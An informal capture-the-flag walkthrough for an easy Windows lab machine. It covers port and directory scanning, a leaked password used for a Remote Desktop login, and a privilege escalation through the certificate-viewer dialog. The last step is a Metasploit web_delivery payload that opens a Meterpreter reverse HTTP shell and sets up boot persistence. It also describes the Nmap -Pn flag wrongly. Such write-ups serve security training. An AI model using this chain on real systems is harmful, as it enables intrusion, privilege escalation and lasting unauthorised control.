Difficulty: Easy (Windows)
sV : Version Scan
-A : Aggressive Scan
-p- : Scan all ports TCP/UDP
-oN : Output of text
-Pn : This is used when the car appears to be down. So we tell Nmap to ping it.
And we have found the hidden directory /retro let’s browse.
Command: gobuster dir -u http://10.10.51.42 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html,js -t 64
And we found a potential Username Wade
Now we move in /author/wade
Click on the comments RSS and we found a potentially password: XXXXXXX
#Microsoft Remote Desktop (MSRDP):
Now we can try to log into the Remote Desktop, thanks to “Remmina”, if you don’t have it, install it. “apt-get install remmina”
Enter the credentials found and the domain and we are in !!!!!
And we found 1st Flag!!
If we continue to browse the machine from remote access, we can see that in the history, there is interesting information about the CVE. Which we could make use of.
Inside the machine we find a program that appears to be executable.
But it seems to want the password. Then click on “show more details”
So it’s asking for Administrator password let’s click on “Show information about the publisher’s certificate”
And click on “VeriSign Commercial Software Publishers CA” after that Internet explorer will open.
Click on “ Settings” “File” and click on “Save as”
So you can see we are getting error click on “OK” and in the “File name” enter this command: C:\Windows\System32\*.* and save.
For more information visit: https://www.youtube.com/watch?v=3BQKpPNlTSo
Now search for : cmd
Type whoami :D
Now let’s go find the root.txt LET’S GOOO!
Now Launch Metasploit now and select ‘exploit/multi/script/web_delivery’
Now show options, and set all the things, remember use “set target 2” PSH
and “ set payload windows/meterpreter/reverse_http”
Now copy this payload in the CMD !
And the session in meterpreter should open.
run persistence -X
We now have full control of the machine, every time it starts up. To carry out further operations. I hope I have been useful to you.